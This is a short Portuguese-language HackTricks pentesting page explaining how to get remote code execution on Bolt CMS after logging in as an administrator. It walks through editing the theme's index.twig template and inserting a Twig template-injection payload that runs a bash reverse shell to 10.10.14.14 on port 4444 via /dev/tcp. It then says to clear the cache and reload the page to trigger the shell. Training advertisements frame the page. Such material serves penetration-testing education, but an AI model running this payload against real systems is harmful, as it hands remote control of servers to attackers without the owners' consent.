Bolt CMS
Last updated
Last updated
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Após fazer login como admin (vá para /bot para acessar o prompt de login), você pode obter RCE no Bolt CMS:
Selecione Configuration
-> View Configuration
-> Main Configuration
ou vá para o caminho da URL /bolt/file-edit/config?file=/bolt/config.yaml
Verifique o valor do tema
Selecione File management
-> View & edit templates
Selecione o tema base encontrado no passo anterior (base-2021
neste caso) e selecione index.twig
No meu caso, isso está no caminho da URL /bolt/file-edit/themes?file=/base-2021/index.twig
Defina seu payload neste arquivo via template injection (Twig), como: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
E salve as alterações
Limpe o cache em Maintenance
-> Clear the cache
Acesse novamente a página como um usuário regular, e o payload deve ser executado
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)